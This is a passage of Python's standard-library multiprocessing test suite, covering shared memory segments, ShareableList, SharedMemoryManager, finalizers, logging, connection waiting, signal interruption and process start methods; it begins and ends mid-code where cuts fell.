shm2 = shared_memory.SharedMemory(create=True, size=1)
self.addCleanup(shm2.unlink)
self.assertEqual(shm2._name, names[1])
if shared_memory._USE_POSIX:
# Posix Shared Memory can only be unlinked once. Here we
# test an implementation detail that is not observed across
# all supported platforms (since WindowsNamedSharedMemory
# manages unlinking on its own and unlink() does nothing).
# True release of shared memory segment does not necessarily
# happen until process exits, depending on the OS platform.
with self.assertRaises(FileNotFoundError):
sms_uno = shared_memory.SharedMemory(
'test01_dblunlink',
create=True,
size=5000
)
try:
self.assertGreaterEqual(sms_uno.size, 5000)
sms_duo = shared_memory.SharedMemory('test01_dblunlink')
sms_duo.unlink() # First shm_unlink() call.
sms_duo.close()
sms_uno.close()
finally:
sms_uno.unlink() # A second shm_unlink() call is bad.
with self.assertRaises(FileExistsError):
# Attempting to create a new shared memory segment with a
# name that is already in use triggers an exception.
there_can_only_be_one_sms = shared_memory.SharedMemory(
'test01_tsmb',
create=True,
size=512
)
if shared_memory._USE_POSIX:
# Requesting creation of a shared memory segment with the option
# to attach to an existing segment, if that name is currently in
# use, should not trigger an exception.
# Note: Using a smaller size could possibly cause truncation of
# the existing segment but is OS platform dependent. In the
# case of MacOS/darwin, requesting a smaller size is disallowed.
class OptionalAttachSharedMemory(shared_memory.SharedMemory):
_flags = os.O_CREAT | os.O_RDWR
ok_if_exists_sms = OptionalAttachSharedMemory('test01_tsmb')
self.assertEqual(ok_if_exists_sms.size, sms.size)
ok_if_exists_sms.close()
# Attempting to attach to an existing shared memory segment when
# no segment exists with the supplied name triggers an exception.
with self.assertRaises(FileNotFoundError):
nonexisting_sms = shared_memory.SharedMemory('test01_notthere')
nonexisting_sms.unlink() # Error should occur on prior line.
sms.close()
# Test creating a shared memory segment with negative size
with self.assertRaises(ValueError):
sms_invalid = shared_memory.SharedMemory(create=True, size=-1)
# Test creating a shared memory segment with size 0
with self.assertRaises(ValueError):
sms_invalid = shared_memory.SharedMemory(create=True, size=0)
# Test creating a shared memory segment without size argument
with self.assertRaises(ValueError):
sms_invalid = shared_memory.SharedMemory(create=True)
def test_shared_memory_across_processes(self):
# bpo-40135: don't define shared memory block's name in case of
# the failure when we run multiprocessing tests in parallel.
sms = shared_memory.SharedMemory(create=True, size=512)
self.addCleanup(sms.unlink)
# Verify remote attachment to existing block by name is working.
p = self.Process(
target=self._attach_existing_shmem_then_write,
args=(sms.name, b'howdy')
)
p.daemon = True
p.start()
p.join()
self.assertEqual(bytes(sms.buf[:5]), b'howdy')
# Verify pickling of SharedMemory instance also works.
p = self.Process(
target=self._attach_existing_shmem_then_write,
args=(sms, b'HELLO')
)
p.daemon = True
p.start()
p.join()
self.assertEqual(bytes(sms.buf[:5]), b'HELLO')
sms.close()
@unittest.skipIf(os.name != "posix", "not feasible in non-posix platforms")
def test_shared_memory_SharedMemoryServer_ignores_sigint(self):
# bpo-36368: protect SharedMemoryManager server process from
# KeyboardInterrupt signals.
smm = multiprocessing.managers.SharedMemoryManager()
smm.start()
# make sure the manager works properly at the beginning
sl = smm.ShareableList(range(10))
# the manager's server should ignore KeyboardInterrupt signals, and
# maintain its connection with the current process, and success when
# asked to deliver memory segments.
os.kill(smm._process.pid, signal.SIGINT)
sl2 = smm.ShareableList(range(10))
# test that the custom signal handler registered in the Manager does
# not affect signal handling in the parent process.
with self.assertRaises(KeyboardInterrupt):
os.kill(os.getpid(), signal.SIGINT)
smm.shutdown()
@unittest.skipIf(os.name != "posix", "resource_tracker is posix only")
def test_shared_memory_SharedMemoryManager_reuses_resource_tracker(self):
# bpo-36867: test that a SharedMemoryManager uses the
# same resource_tracker process as its parent.
cmd = '''if 1:
from multiprocessing.managers import SharedMemoryManager
smm = SharedMemoryManager()
smm.start()
sl = smm.ShareableList(range(10))
smm.shutdown()
'''
rc, out, err = test.support.script_helper.assert_python_ok('-c', cmd)
# Before bpo-36867 was fixed, a SharedMemoryManager not using the same
# resource_tracker process as its parent would make the parent's
# tracker complain about sl being leaked even though smm.shutdown()
# properly released sl.
self.assertFalse(err)
def test_shared_memory_SharedMemoryManager_basics(self):
smm1 = multiprocessing.managers.SharedMemoryManager()
with self.assertRaises(ValueError):
smm1.SharedMemory(size=9) # Fails if SharedMemoryServer not started
smm1.start()
lol = [ smm1.ShareableList(range(i)) for i in range(5, 10) ]
lom = [ smm1.SharedMemory(size=j) for j in range(32, 128, 16) ]
doppleganger_list0 = shared_memory.ShareableList(name=lol[0].shm.name)
self.assertEqual(len(doppleganger_list0), 5)
doppleganger_shm0 = shared_memory.SharedMemory(name=lom[0].name)
self.assertGreaterEqual(len(doppleganger_shm0.buf), 32)
held_name = lom[0].name
smm1.shutdown()
if sys.platform != "win32":
# Calls to unlink() have no effect on Windows platform; shared
# memory will only be released once final process exits.
with self.assertRaises(FileNotFoundError):
# No longer there to be attached to again.
absent_shm = shared_memory.SharedMemory(name=held_name)
with multiprocessing.managers.SharedMemoryManager() as smm2:
sl = smm2.ShareableList("howdy")
shm = smm2.SharedMemory(size=128)
held_name = sl.shm.name
if sys.platform != "win32":
with self.assertRaises(FileNotFoundError):
# No longer there to be attached to again.
absent_sl = shared_memory.ShareableList(name=held_name)
def test_shared_memory_ShareableList_basics(self):
sl = shared_memory.ShareableList(
['howdy', b'HoWdY', -273.154, 100, None, True, 42]
)
self.addCleanup(sl.shm.unlink)
# Verify attributes are readable.
self.assertEqual(sl.format, '8s8sdqxxxxxx?xxxxxxxx?q')
# Exercise len().
self.assertEqual(len(sl), 7)
# Exercise index().
with warnings.catch_warnings():
# Suppress BytesWarning when comparing against b'HoWdY'.
warnings.simplefilter('ignore')
with self.assertRaises(ValueError):
sl.index('100')
self.assertEqual(sl.index(100), 3)
# Exercise retrieving individual values.
self.assertEqual(sl[0], 'howdy')
self.assertEqual(sl[-2], True)
# Exercise iterability.
self.assertEqual(
tuple(sl),
('howdy', b'HoWdY', -273.154, 100, None, True, 42)
)
# Exercise modifying individual values.
sl[3] = 42
self.assertEqual(sl[3], 42)
sl[4] = 'some' # Change type at a given position.
self.assertEqual(sl[4], 'some')
self.assertEqual(sl.format, '8s8sdq8sxxxxxxx?q')
with self.assertRaisesRegex(ValueError,
"exceeds available storage"):
sl[4] = 'far too many'
self.assertEqual(sl[4], 'some')
sl[0] = 'encodés' # Exactly 8 bytes of UTF-8 data
self.assertEqual(sl[0], 'encodés')
self.assertEqual(sl[1], b'HoWdY') # no spillage
with self.assertRaisesRegex(ValueError,
"exceeds available storage"):
sl[0] = 'encodées' # Exactly 9 bytes of UTF-8 data
self.assertEqual(sl[1], b'HoWdY')
with self.assertRaisesRegex(ValueError,
"exceeds available storage"):
sl[1] = b'123456789'
self.assertEqual(sl[1], b'HoWdY')
# Exercise count().
with warnings.catch_warnings():
# Suppress BytesWarning when comparing against b'HoWdY'.
warnings.simplefilter('ignore')
self.assertEqual(sl.count(42), 2)
self.assertEqual(sl.count(b'HoWdY'), 1)
self.assertEqual(sl.count(b'adios'), 0)
# Exercise creating a duplicate.
sl_copy = shared_memory.ShareableList(sl, name='test03_duplicate')
try:
self.assertNotEqual(sl.shm.name, sl_copy.shm.name)
self.assertEqual('test03_duplicate', sl_copy.shm.name)
self.assertEqual(list(sl), list(sl_copy))
self.assertEqual(sl.format, sl_copy.format)
sl_copy[-1] = 77
self.assertEqual(sl_copy[-1], 77)
self.assertNotEqual(sl[-1], 77)
sl_copy.shm.close()
finally:
sl_copy.shm.unlink()
# Obtain a second handle on the same ShareableList.
sl_tethered = shared_memory.ShareableList(name=sl.shm.name)
self.assertEqual(sl.shm.name, sl_tethered.shm.name)
sl_tethered[-1] = 880
self.assertEqual(sl[-1], 880)
sl_tethered.shm.close()
sl.shm.close()
# Exercise creating an empty ShareableList.
empty_sl = shared_memory.ShareableList()
try:
self.assertEqual(len(empty_sl), 0)
self.assertEqual(empty_sl.format, '')
self.assertEqual(empty_sl.count('any'), 0)
with self.assertRaises(ValueError):
empty_sl.index(None)
empty_sl.shm.close()
finally:
empty_sl.shm.unlink()
def test_shared_memory_ShareableList_pickling(self):
sl = shared_memory.ShareableList(range(10))
self.addCleanup(sl.shm.unlink)
serialized_sl = pickle.dumps(sl)
deserialized_sl = pickle.loads(serialized_sl)
self.assertTrue(
isinstance(deserialized_sl, shared_memory.ShareableList)
)
self.assertTrue(deserialized_sl[-1], 9)
self.assertFalse(sl is deserialized_sl)
deserialized_sl[4] = "changed"
self.assertEqual(sl[4], "changed")
# Verify data is not being put into the pickled representation.
name = 'a' * len(sl.shm.name)
larger_sl = shared_memory.ShareableList(range(400))
self.addCleanup(larger_sl.shm.unlink)
serialized_larger_sl = pickle.dumps(larger_sl)
self.assertTrue(len(serialized_sl) == len(serialized_larger_sl))
larger_sl.shm.close()
deserialized_sl.shm.close()
sl.shm.close()
def test_shared_memory_cleaned_after_process_termination(self):
cmd = '''if 1:
import os, time, sys
from multiprocessing import shared_memory
# Create a shared_memory segment, and send the segment name
sm = shared_memory.SharedMemory(create=True, size=10)
sys.stdout.write(sm.name + '\\n')
sys.stdout.flush()
time.sleep(100)
'''
with subprocess.Popen([sys.executable, '-E', '-c', cmd],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as p:
name = p.stdout.readline().strip().decode()
# killing abruptly processes holding reference to a shared memory
# segment should not leak the given memory segment.
p.terminate()
p.wait()
deadline = time.monotonic() + support.LONG_TIMEOUT
t = 0.1
while time.monotonic() < deadline:
time.sleep(t)
t = min(t*2, 5)
try:
smm = shared_memory.SharedMemory(name, create=False)
except FileNotFoundError:
break
else:
raise AssertionError("A SharedMemory segment was leaked after"
" a process was abruptly terminated.")
if os.name == 'posix':
# A warning was emitted by the subprocess' own
# resource_tracker (on Windows, shared memory segments
# are released automatically by the OS).
err = p.stderr.read().decode()
self.assertIn(
"resource_tracker: There appear to be 1 leaked "
"shared_memory objects to clean up at shutdown", err)
#
#
#
class _TestFinalize(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
self.registry_backup = util._finalizer_registry.copy()
util._finalizer_registry.clear()
def tearDown(self):
self.assertFalse(util._finalizer_registry)
util._finalizer_registry.update(self.registry_backup)
@classmethod
def _test_finalize(cls, conn):
class Foo(object):
pass
a = Foo()
util.Finalize(a, conn.send, args=('a',))
del a # triggers callback for a
b = Foo()
close_b = util.Finalize(b, conn.send, args=('b',))
close_b() # triggers callback for b
close_b() # does nothing because callback has already been called
del b # does nothing because callback has already been called
c = Foo()
util.Finalize(c, conn.send, args=('c',))
d10 = Foo()
util.Finalize(d10, conn.send, args=('d10',), exitpriority=1)
d01 = Foo()
util.Finalize(d01, conn.send, args=('d01',), exitpriority=0)
d02 = Foo()
util.Finalize(d02, conn.send, args=('d02',), exitpriority=0)
d03 = Foo()
util.Finalize(d03, conn.send, args=('d03',), exitpriority=0)
util.Finalize(None, conn.send, args=('e',), exitpriority=-10)
util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100)
# call multiprocessing's cleanup function then exit process without
# garbage collecting locals
util._exit_function()
conn.close()
os._exit(0)
def test_finalize(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._test_finalize, args=(child_conn,))
p.daemon = True
p.start()
p.join()
result = [obj for obj in iter(conn.recv, 'STOP')]
self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e'])
def test_thread_safety(self):
# bpo-24484: _run_finalizers() should be thread-safe
def cb():
pass
class Foo(object):
def __init__(self):
self.ref = self # create reference cycle
# insert finalizer at random key
util.Finalize(self, cb, exitpriority=random.randint(1, 100))
finish = False
exc = None
def run_finalizers():
nonlocal exc
while not finish:
time.sleep(random.random() * 1e-1)
try:
# A GC run will eventually happen during this,
# collecting stale Foo's and mutating the registry
util._run_finalizers()
except Exception as e:
exc = e
def make_finalizers():
nonlocal exc
d = {}
while not finish:
try:
# Old Foo's get gradually replaced and later
# collected by the GC (because of the cyclic ref)
d[random.getrandbits(5)] = {Foo() for i in range(10)}
except Exception as e:
exc = e
d.clear()
old_interval = sys.getswitchinterval()
old_threshold = gc.get_threshold()
try:
sys.setswitchinterval(1e-6)
gc.set_threshold(5, 5, 5)
threads = [threading.Thread(target=run_finalizers),
threading.Thread(target=make_finalizers)]
with test.support.start_threads(threads):
time.sleep(4.0) # Wait a bit to trigger race condition
finish = True
if exc is not None:
raise exc
finally:
sys.setswitchinterval(old_interval)
gc.set_threshold(*old_threshold)
gc.collect() # Collect remaining Foo's
#
# Test that from ... import * works for each module
#
class _TestImportStar(unittest.TestCase):
def get_module_names(self):
import glob
folder = os.path.dirname(multiprocessing.__file__)
pattern = os.path.join(glob.escape(folder), '*.py')
files = glob.glob(pattern)
modules = [os.path.splitext(os.path.split(f)[1])[0] for f in files]
modules = ['multiprocessing.' + m for m in modules]
modules.remove('multiprocessing.__init__')
modules.append('multiprocessing')
return modules
def test_import(self):
modules = self.get_module_names()
if sys.platform == 'win32':
modules.remove('multiprocessing.popen_fork')
modules.remove('multiprocessing.popen_forkserver')
modules.remove('multiprocessing.popen_spawn_posix')
else:
modules.remove('multiprocessing.popen_spawn_win32')
if not HAS_REDUCTION:
modules.remove('multiprocessing.popen_forkserver')
if c_int is None:
# This module requires _ctypes
modules.remove('multiprocessing.sharedctypes')
for name in modules:
__import__(name)
mod = sys.modules[name]
self.assertTrue(hasattr(mod, '__all__'), name)
for attr in mod.__all__:
self.assertTrue(
hasattr(mod, attr),
'%r does not have attribute %r' % (mod, attr)
)
#
# Quick test that logging works -- does not test logging output
#
class _TestLogging(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_enable_logging(self):
logger = multiprocessing.get_logger()
logger.setLevel(util.SUBWARNING)
self.assertTrue(logger is not None)
logger.debug('this will not be printed')
logger.info('nor will this')
logger.setLevel(LOG_LEVEL)
@classmethod
def _test_level(cls, conn):
logger = multiprocessing.get_logger()
conn.send(logger.getEffectiveLevel())
def test_level(self):
LEVEL1 = 32
LEVEL2 = 37
logger = multiprocessing.get_logger()
root_logger = logging.getLogger()
root_level = root_logger.level
reader, writer = multiprocessing.Pipe(duplex=False)
logger.setLevel(LEVEL1)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL1, reader.recv())
p.join()
p.close()
logger.setLevel(logging.NOTSET)
root_logger.setLevel(LEVEL2)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL2, reader.recv())
p.join()
p.close()
root_logger.setLevel(root_level)
logger.setLevel(level=LOG_LEVEL)
# class _TestLoggingProcessName(BaseTestCase):
#
# def handle(self, record):
# assert record.processName == multiprocessing.current_process().name
# self.__handled = True
#
# def test_logging(self):
# handler = logging.Handler()
# handler.handle = self.handle
# self.__handled = False
# # Bypass getLogger() and side-effects
# logger = logging.getLoggerClass()(
# 'multiprocessing.test.TestLoggingProcessName')
# logger.addHandler(handler)
# logger.propagate = False
#
# logger.warn('foo')
# assert self.__handled
#
# Check that Process.join() retries if os.waitpid() fails with EINTR
#
class _TestPollEintr(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def _killer(cls, pid):
time.sleep(0.1)
os.kill(pid, signal.SIGUSR1)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_poll_eintr(self):
got_signal = [False]
def record(*args):
got_signal[0] = True
pid = os.getpid()
oldhandler = signal.signal(signal.SIGUSR1, record)
try:
killer = self.Process(target=self._killer, args=(pid,))
killer.start()
try:
p = self.Process(target=time.sleep, args=(2,))
p.start()
p.join()
finally:
killer.join()
self.assertTrue(got_signal[0])
self.assertEqual(p.exitcode, 0)
finally:
signal.signal(signal.SIGUSR1, oldhandler)
#
# Test to verify handle verification, see issue 3321
#
class TestInvalidHandle(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_handles(self):
conn = multiprocessing.connection.Connection(44977608)
# check that poll() doesn't crash
try:
conn.poll()
except (ValueError, OSError):
pass
finally:
# Hack private attribute _handle to avoid printing an error
# in conn.__del__
conn._handle = None
self.assertRaises((ValueError, OSError),
multiprocessing.connection.Connection, -1)
@hashlib_helper.requires_hashdigest('md5')
class OtherTest(unittest.TestCase):
# TODO: add more tests for deliver/answer challenge.
def test_deliver_challenge_auth_failure(self):
class _FakeConnection(object):
def recv_bytes(self, size):
return b'something bogus'
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.deliver_challenge,
_FakeConnection(), b'abc')
def test_answer_challenge_auth_failure(self):
class _FakeConnection(object):
def __init__(self):
self.count = 0
def recv_bytes(self, size):
self.count += 1
if self.count == 1:
return multiprocessing.connection.CHALLENGE
elif self.count == 2:
return b'something bogus'
return b''
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.answer_challenge,
_FakeConnection(), b'abc')
#
# Test Manager.start()/Pool.__init__() initializer feature - see issue 5585
#
def initializer(ns):
ns.test += 1
@hashlib_helper.requires_hashdigest('md5')
class TestInitializers(unittest.TestCase):
def setUp(self):
self.mgr = multiprocessing.Manager()
self.ns = self.mgr.Namespace()
self.ns.test = 0
def tearDown(self):
self.mgr.shutdown()
self.mgr.join()
def test_manager_initializer(self):
m = multiprocessing.managers.SyncManager()
self.assertRaises(TypeError, m.start, 1)
m.start(initializer, (self.ns,))
self.assertEqual(self.ns.test, 1)
m.shutdown()
m.join()
def test_pool_initializer(self):
self.assertRaises(TypeError, multiprocessing.Pool, initializer=1)
p = multiprocessing.Pool(1, initializer, (self.ns,))
p.close()
p.join()
self.assertEqual(self.ns.test, 1)
#
# Issue 5155, 5313, 5331: Test process in processes
# Verifies os.close(sys.stdin.fileno) vs. sys.stdin.close() behavior
#
def _this_sub_process(q):
try:
item = q.get(block=False)
except pyqueue.Empty:
pass
def _test_process():
queue = multiprocessing.Queue()
subProc = multiprocessing.Process(target=_this_sub_process, args=(queue,))
subProc.daemon = True
subProc.start()
subProc.join()
def _afunc(x):
return x*x
def pool_in_process():
pool = multiprocessing.Pool(processes=4)
x = pool.map(_afunc, [1, 2, 3, 4, 5, 6, 7])
pool.close()
pool.join()
class _file_like(object):
def __init__(self, delegate):
self._delegate = delegate
self._pid = None
@property
def cache(self):
pid = os.getpid()
# There are no race conditions since fork keeps only the running thread
if pid != self._pid:
self._pid = pid
self._cache = []
return self._cache
def write(self, data):
self.cache.append(data)
def flush(self):
self._delegate.write(''.join(self.cache))
self._cache = []
class TestStdinBadfiledescriptor(unittest.TestCase):
def test_queue_in_process(self):
proc = multiprocessing.Process(target=_test_process)
proc.start()
proc.join()
def test_pool_in_process(self):
p = multiprocessing.Process(target=pool_in_process)
p.start()
p.join()
def test_flushing(self):
sio = io.StringIO()
flike = _file_like(sio)
flike.write('foo')
proc = multiprocessing.Process(target=lambda: flike.flush())
flike.flush()
assert sio.getvalue() == 'foo'
class TestWait(unittest.TestCase):
@classmethod
def _child_test_wait(cls, w, slow):
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
w.send((i, os.getpid()))
w.close()
def test_wait(self, slow=False):
from multiprocessing.connection import wait
readers = []
procs = []
messages = []
for i in range(4):
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._child_test_wait, args=(w, slow))
p.daemon = True
p.start()
w.close()
readers.append(r)
procs.append(p)
self.addCleanup(p.join)
while readers:
for r in wait(readers):
try:
msg = r.recv()
except EOFError:
readers.remove(r)
r.close()
else:
messages.append(msg)
messages.sort()
expected = sorted((i, p.pid) for i in range(10) for p in procs)
self.assertEqual(messages, expected)
@classmethod
def _child_test_wait_socket(cls, address, slow):
s = socket.socket()
s.connect(address)
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
s.sendall(('%s\n' % i).encode('ascii'))
s.close()
def test_wait_socket(self, slow=False):
from multiprocessing.connection import wait
l = socket.create_server((socket_helper.HOST, 0))
addr = l.getsockname()
readers = []
procs = []
dic = {}
for i in range(4):
p = multiprocessing.Process(target=self._child_test_wait_socket,
args=(addr, slow))
p.daemon = True
p.start()
procs.append(p)
self.addCleanup(p.join)
for i in range(4):
r, _ = l.accept()
readers.append(r)
dic[r] = []
l.close()
while readers:
for r in wait(readers):
msg = r.recv(32)
if not msg:
readers.remove(r)
r.close()
else:
dic[r].append(msg)
expected = ''.join('%s\n' % i for i in range(10)).encode('ascii')
for v in dic.values():
self.assertEqual(b''.join(v), expected)
def test_wait_slow(self):
self.test_wait(True)
def test_wait_socket_slow(self):
self.test_wait_socket(True)
def test_wait_timeout(self):
from multiprocessing.connection import wait
expected = 5
a, b = multiprocessing.Pipe()
start = time.monotonic()
res = wait([a, b], expected)
delta = time.monotonic() - start
self.assertEqual(res, [])
self.assertLess(delta, expected * 2)
self.assertGreater(delta, expected * 0.5)
b.send(None)
start = time.monotonic()
res = wait([a, b], 20)
delta = time.monotonic() - start
self.assertEqual(res, [a])
self.assertLess(delta, 0.4)
@classmethod
def signal_and_sleep(cls, sem, period):
sem.release()
time.sleep(period)
def test_wait_integer(self):
from multiprocessing.connection import wait
expected = 3
sorted_ = lambda l: sorted(l, key=lambda x: id(x))
sem = multiprocessing.Semaphore(0)
a, b = multiprocessing.Pipe()
p = multiprocessing.Process(target=self.signal_and_sleep,
args=(sem, expected))
p.start()
self.assertIsInstance(p.sentinel, int)
self.assertTrue(sem.acquire(timeout=20))
start = time.monotonic()
res = wait([a, p.sentinel, b], expected + 20)
delta = time.monotonic() - start
self.assertEqual(res, [p.sentinel])
self.assertLess(delta, expected + 2)
self.assertGreater(delta, expected - 2)
a.send(None)
start = time.monotonic()
res = wait([a, p.sentinel, b], 20)
delta = time.monotonic() - start
self.assertEqual(sorted_(res), sorted_([p.sentinel, b]))
self.assertLess(delta, 0.4)
b.send(None)
start = time.monotonic()
res = wait([a, p.sentinel, b], 20)
delta = time.monotonic() - start
self.assertEqual(sorted_(res), sorted_([a, p.sentinel, b]))
self.assertLess(delta, 0.4)
p.terminate()
p.join()
def test_neg_timeout(self):
from multiprocessing.connection import wait
a, b = multiprocessing.Pipe()
t = time.monotonic()
res = wait([a], timeout=-1)
t = time.monotonic() - t
self.assertEqual(res, [])
self.assertLess(t, 1)
a.close()
b.close()
#
# Issue 14151: Test invalid family on invalid environment
#
class TestInvalidFamily(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_family(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener(r'\\.\test')
@unittest.skipUnless(WIN32, "skipped on non-Windows platforms")
def test_invalid_family_win32(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener('/var/test.pipe')
#
# Issue 12098: check sys.flags of child matches that for parent
#
class TestFlags(unittest.TestCase):
@classmethod
def run_in_grandchild(cls, conn):
conn.send(tuple(sys.flags))
@classmethod
def run_in_child(cls):
import json
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=cls.run_in_grandchild, args=(w,))
p.start()
grandchild_flags = r.recv()
p.join()
r.close()
w.close()
flags = (tuple(sys.flags), grandchild_flags)
print(json.dumps(flags))
def test_flags(self):
import json
# start child process using unusual flags
prog = ('from test._test_multiprocessing import TestFlags; ' +
'TestFlags.run_in_child()')
data = subprocess.check_output(
[sys.executable, '-E', '-S', '-O', '-c', prog])
child_flags, grandchild_flags = json.loads(data.decode('ascii'))
self.assertEqual(child_flags, grandchild_flags)
#
# Test interaction with socket timeouts - see Issue #6056
#
class TestTimeouts(unittest.TestCase):
@classmethod
def _test_timeout(cls, child, address):
time.sleep(1)
child.send(123)
child.close()
conn = multiprocessing.connection.Client(address)
conn.send(456)
conn.close()
def test_timeout(self):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(0.1)
parent, child = multiprocessing.Pipe(duplex=True)
l = multiprocessing.connection.Listener(family='AF_INET')
p = multiprocessing.Process(target=self._test_timeout,
args=(child, l.address))
p.start()
child.close()
self.assertEqual(parent.recv(), 123)
parent.close()
conn = l.accept()
self.assertEqual(conn.recv(), 456)
conn.close()
l.close()
join_process(p)
finally:
socket.setdefaulttimeout(old_timeout)
#
# Test what happens with no "if __name__ == '__main__'"
#
class TestNoForkBomb(unittest.TestCase):
def test_noforkbomb(self):
sm = multiprocessing.get_start_method()
name = os.path.join(os.path.dirname(__file__), 'mp_fork_bomb.py')
if sm != 'fork':
rc, out, err = test.support.script_helper.assert_python_failure(name, sm)
self.assertEqual(out, b'')
self.assertIn(b'RuntimeError', err)
else:
rc, out, err = test.support.script_helper.assert_python_ok(name, sm)
self.assertEqual(out.rstrip(), b'123')
self.assertEqual(err, b'')
#
# Issue #17555: ForkAwareThreadLock
#
class TestForkAwareThreadLock(unittest.TestCase):
# We recursively start processes. Issue #17555 meant that the
# after fork registry would get duplicate entries for the same
# lock. The size of the registry at generation n was ~2**n.
@classmethod
def child(cls, n, conn):
if n > 1:
p = multiprocessing.Process(target=cls.child, args=(n-1, conn))
p.start()
conn.close()
join_process(p)
else:
conn.send(len(util._afterfork_registry))
conn.close()
def test_lock(self):
r, w = multiprocessing.Pipe(False)
l = util.ForkAwareThreadLock()
old_size = len(util._afterfork_registry)
p = multiprocessing.Process(target=self.child, args=(5, w))
p.start()
w.close()
new_size = r.recv()
join_process(p)
self.assertLessEqual(new_size, old_size)
#
# Check that non-forked child processes do not inherit unneeded fds/handles
#
class TestCloseFds(unittest.TestCase):
def get_high_socket_fd(self):
if WIN32:
# The child process will not have any socket handles, so
# calling socket.fromfd() should produce WSAENOTSOCK even
# if there is a handle of the same number.
return socket.socket().detach()
else:
# We want to produce a socket with an fd high enough that a
# freshly created child process will not have any fds as high.
fd = socket.socket().detach()
to_close = []
while fd < 50:
to_close.append(fd)
fd = os.dup(fd)
for x in to_close:
os.close(x)
return fd
def close(self, fd):
if WIN32:
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=fd).close()
else:
os.close(fd)
@classmethod
def _test_closefds(cls, conn, fd):
try:
s = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
except Exception as e:
conn.send(e)
else:
s.close()
conn.send(None)
def test_closefd(self):
if not HAS_REDUCTION:
raise unittest.SkipTest('requires fd pickling')
reader, writer = multiprocessing.Pipe()
fd = self.get_high_socket_fd()
try:
p = multiprocessing.Process(target=self._test_closefds,
args=(writer, fd))
p.start()
writer.close()
e = reader.recv()
join_process(p)
finally:
self.close(fd)
writer.close()
reader.close()
if multiprocessing.get_start_method() == 'fork':
self.assertIs(e, None)
else:
WSAENOTSOCK = 10038
self.assertIsInstance(e, OSError)
self.assertTrue(e.errno == errno.EBADF or
e.winerror == WSAENOTSOCK, e)
#
# Issue #17097: EINTR should be ignored by recv(), send(), accept() etc
#
class TestIgnoreEINTR(unittest.TestCase):
# Sending CONN_MAX_SIZE bytes into a multiprocessing pipe must block
CONN_MAX_SIZE = max(support.PIPE_MAX_SIZE, support.SOCK_MAX_SIZE)
@classmethod
def _test_ignore(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
conn.send('ready')
x = conn.recv()
conn.send(x)
conn.send_bytes(b'x' * cls.CONN_MAX_SIZE)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
self.assertEqual(conn.recv(), 'ready')
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
conn.send(1234)
self.assertEqual(conn.recv(), 1234)
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
self.assertEqual(conn.recv_bytes(), b'x' * self.CONN_MAX_SIZE)
time.sleep(0.1)
p.join()
finally:
conn.close()
@classmethod
def _test_ignore_listener(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
with multiprocessing.connection.Listener() as l:
conn.send(l.address)
a = l.accept()
a.send('welcome')
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore_listener(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore_listener,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
address = conn.recv()
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
client = multiprocessing.connection.Client(address)
self.assertEqual(client.recv(), 'welcome')
p.join()
finally:
conn.close()
class TestStartMethod(unittest.TestCase):
@classmethod
def _check_context(cls, conn):
conn.send(multiprocessing.get_start_method())
def check_context(self, ctx):
r, w = ctx.Pipe(duplex=False)
p = ctx.Process(target=self._check_context, args=(w,))
p.start()
w.close()
child_method = r.recv()
r.close()
p.join()
self.assertEqual(child_method, ctx.get_start_method())
def test_context(self):
for method in ('fork', 'spawn', 'forkserver'):
try:
ctx = multiprocessing.get_context(method)
except ValueError:
continue
self.assertEqual(ctx.get_start_method(), method)
self.assertIs(ctx.get_context(), ctx)
self.assertRaises(ValueError, ctx.set_start_method, 'spawn')
self.assertRaises(ValueError, ctx.set_start_method, None)
self.check_context(ctx)
def test_set_get(self):
multiprocessing.set_forkserver_preload(PRELOAD)
count = 0
old_method = multiprocessing.get_start_method()
try:
for method in ('fork', 'spawn', 'forkserver'):
try:
multiprocessing.set_start_method(method, force=True)
except ValueError:
continue
self.assertEqual(multiprocessing.get_start_method(), method)
ctx = multiprocessing.get_context()
self.assertEqual(ctx.get_start_method(), method)
self.assertTrue(type(ctx).__name__.lower().startswith(method))
self.assertTrue(
ctx.Process.__name__.lower().startswith(method))
self.check_context(multiprocessing)
count += 1
finally:
multiprocessing.set_start_method(old_method, force=True)
self.assertGreaterEqual(count, 1)
def test_get_all(self):
methods = multiprocessing.get_all_start_methods()
if sys.platform == 'win32':
